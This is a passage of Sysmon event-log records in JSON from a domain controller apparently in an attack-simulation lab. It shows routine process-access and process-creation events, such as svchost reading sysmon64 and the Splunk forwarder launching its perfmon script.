05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.404\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-001078630500}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.404","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-001078630500}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.516\r\nProcessGuid: {A837DB8D-023D-5F25-0000-0010A2650500}\r\nProcessId: 2284\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.516","ProcessGuid":"{A837DB8D-023D-5F25-0000-0010A2650500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00108A6E0100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program 